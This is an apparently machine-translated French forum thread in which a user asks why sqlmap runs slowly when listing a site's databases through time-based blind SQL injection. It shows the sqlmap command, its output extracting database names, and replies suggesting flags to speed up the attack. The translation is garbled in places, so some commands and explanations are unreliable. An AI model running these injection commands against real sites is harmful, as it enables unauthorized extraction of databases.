sqlmap est trop lent
Voici un exemple. Juste essayer de lister les bases de données:
python sqlmap.py -u "http://somesite.com/?id=1" --dbs
[15:20:32] [INFO] fetching database names
[15:20:32] [INFO] fetching number of databases
[15:20:32] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[15:20:39] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
2
[15:20:55] [INFO] adjusting time delay to 2 seconds due to good response times
2
[15:20:58] [INFO] retrieved: 100_MYDB
[15:22:39] [INFO] retrieved: DEV_GC_DATASTORAGE
[15:26:15] [INFO] retrieved: GC_
Vous pouvez le voir dans les horodateurs il faut environ 3 minutes de la liste 1, nom de base de données, il va de, caractère par caractère, chaque personnage prend environ 7 secondes. Les tutoriels que j'ai vu sur youtube sont superfast...
Que puis-je faire pour accélérer le processus? J'ai essayé de jouer avec .conf
Grâce.
Qu'est-ce que la latence du réseau de
Wow, ce pourrait être le problème. Aucune idée pourquoi? J'ai supposé que ce n'était pas le site est la faute car il charge super rapidement dans le navigateur. Mais les demandes sont de timing dans les pings.
somesite.com
? Vous pouvez le vérifier simplement en faisant ping somesite.com
. Si la latence est élevée, faire des blind SQL injection sera lentement que vous le test de char par char.Wow, ce pourrait être le problème. Aucune idée pourquoi? J'ai supposé que ce n'était pas le site est la faute car il charge super rapidement dans le navigateur. Mais les demandes sont de timing dans les pings.
OriginalL'auteur Farzher | 2012-07-04
Vous devez vous connecter pour publier un commentaire.
Vous pouvez également utiliser le commutateur-o pour certaines optimisations. Essayez aussi --technique=BEUS
OriginalL'auteur mmeyer2k
Qu'est-ce que la latence du réseau de somesite.com? Vous pouvez le vérifier simplement en faisant un ping somesite.com. Si la latence est élevée, faire des blind SQL injection sera lentement que vous le test de char par char. – rgerganov 4 Juil à 19:43
OriginalL'auteur Farzher
Utiliser plus de threads. Valeur par défaut est 1:
OriginalL'auteur jonasl
vous pouvez utiliser ce genre de réponse rapide.
sqlmap -u "http://somesite.com/?id=1" --temps sec 15
OriginalL'auteur Sajid